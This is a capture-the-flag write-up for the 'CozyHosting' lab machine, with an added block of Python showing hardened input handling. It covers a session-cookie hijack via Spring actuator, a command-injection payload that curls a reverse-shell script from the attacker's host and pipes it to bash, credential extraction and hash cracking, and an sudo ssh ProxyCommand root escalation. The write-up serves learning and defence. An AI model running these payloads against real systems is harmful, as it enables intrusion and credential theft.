CozyHosting

User flag

Initial nmap:

$ nmap -sC -sV cozyhosting.htb
Starting Nmap 7.93 ( https://nmap.org ) at 2023-09-04 20:39 CDT
Nmap scan report for cozyhosting.htb (10.10.11.230)
Host is up (0.11s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   256 4356bca7f2ec46ddc10f83304c2caaa8 (ECDSA)
|_  256 6f7a6c3fa68de27595d47b71ac4f7e42 (ED25519)
80/tcp open  http    nginx 1.18.0 (Ubuntu)
|_http-title: Cozy Hosting - Home
|_http-server-header: nginx/1.18.0 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 253.57 seconds

The login page seems to be the only thing of interest on the site, but I wasn't able to get in using common username/password combinations or SQL injection.

After running gobuster, I found that the /error page revealed a message indicating that the box is running Spring Boot. Testing showed that it's possible to access the Spring actuator endpoints (https://book.hacktricks.xyz/network-services-pentesting/pentesting-web/spring-actuators).

We can then grab a session ID from /actuator/sessions and replace our own cookie with it to gain access to the admin panel at /admin.

There's only one field we can access on the page, and after poking around I found that the username field is vulnerable to command injection: submitting user;whoami gives this error:

The host was not added!
ssh: Could not resolve hostname user: Temporary failure in name resolution/bin/bash: line 1: whoami@localhost: command not found

Unfortunately, we can't use a space in this field, but https://unix.stackexchange.com/a/351509 shows a workaround.

We can then send this payload, which fetches a reverse-shell script hosted on our machine on port 8090:

a;$(curl${IFS}10.10.14.16:8090/revshell.sh|bash)#
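The root cause is that the form value is concatenated into a shell command line. As an added example (not code from the box or its application), here is how that field should be handled: allowlist-validate the username and hostname, then pass ssh an argv list with no shell, so metacharacters and the ${IFS} trick have nothing to expand. The command shape and the check function are assumptions for illustration.

```python
import re
import subprocess

# Allowlist: a conventional Linux login name and a DNS hostname. Requiring a
# letter or underscore first also blocks a leading "-", which ssh would
# otherwise parse as an option (argument injection).
USERNAME_RE = re.compile(r"^[a-z_][a-z0-9_-]{0,31}$")
LABEL = r"[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?"
HOSTNAME_RE = re.compile(rf"^{LABEL}(?:\.{LABEL})*$")


def unsafe_command(username, hostname):
    """The bug class from the write-up: input concatenated into a shell
    string. Returned for inspection only; never executed in this example."""
    return f"ssh -o ConnectTimeout=5 {username}@{hostname} true"


def safe_command(username, hostname):
    """Hardened form: validate, then build an argv list. With shell=False the
    ';', '$(...)', '|', '#' and ${IFS} in a payload are just literal bytes
    inside one argument that ssh will reject as an unresolvable host."""
    if not USERNAME_RE.fullmatch(username):
        raise ValueError("invalid username")
    if len(hostname) > 253 or not HOSTNAME_RE.fullmatch(hostname):
        raise ValueError("invalid hostname")
    return ["ssh", "-o", "ConnectTimeout=5", f"{username}@{hostname}", "true"]


def run_check(username, hostname):
    """Assumed wrapper for the 'add host' feature: no shell is ever spawned."""
    argv = safe_command(username, hostname)
    return subprocess.run(argv, shell=False, capture_output=True,
                          text=True, timeout=10)


def is_rejected(username, hostname="localhost"):
    """True when validation refuses the input before any process is started."""
    try:
        safe_command(username, hostname)
    except ValueError:
        return True
    return False
```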

With the reverse shell, we can look around for anything interesting. The only thing I could find was cloudhosting-0.0.1.jar, which is the application itself.

cp cloudhosting-0.0.1.jar /dev/shm && cd /dev/shm
unzip cloudhosting-0.0.1.jar && rm cloudhosting-0.0.1.jar
grep -ra password

The interesting line from the output is:

BOOT-INF/classes/application.properties:spring.datasource.password=...

We can then look for a similar line to find the username:

grep -ra spring.datasource.user

This shows that the database user is postgres. I attempted to su to that user without success, so next I tried psql with the password from the properties file:

psql -h localhost -U postgres
Password: ...
\l
                                   List of databases
    Name     |  Owner   | Encoding |   Collate   |    Ctype    |   Access privileges   
-------------+----------+----------+-------------+-------------+-----------------------
 cozyhosting | postgres | UTF8     | en_US.UTF-8 | en_US.UTF-8 | 
 postgres    | postgres | UTF8     | en_US.UTF-8 | en_US.UTF-8 | 
 template0   | postgres | UTF8     | en_US.UTF-8 | en_US.UTF-8 | =c/postgres          +
             |          |          |             |             | postgres=CTc/postgres
 template1   | postgres | UTF8     | en_US.UTF-8 | en_US.UTF-8 | =c/postgres          +
             |          |          |             |             | postgres=CTc/postgres

\c cozyhosting
You are now connected to database "cozyhosting" as user "postgres".

\dt
         List of relations
 Schema | Name  | Type  |  Owner   
--------+-------+-------+----------
 public | hosts | table | postgres
 public | users | table | postgres
(2 rows)

select * from users;
   name    |                           password                           | role  
-----------+--------------------------------------------------------------+-------
 kanderson | ...                                                          | User
 admin     | ...                                                          | Admin
(2 rows)

We can then crack the password hashes using john:

john -w=rockyou.txt hashes

This yields a password that we can use to sign in as the system user (josh). From there we can read the user flag.

Root flag

Running sudo -l shows that we are able to run ssh as root. Looking this up on GTFOBins shows that we only need to run this command to get root:

sudo ssh -o ProxyCommand=';sh 0<&2 1>&2' x

Then get the flag.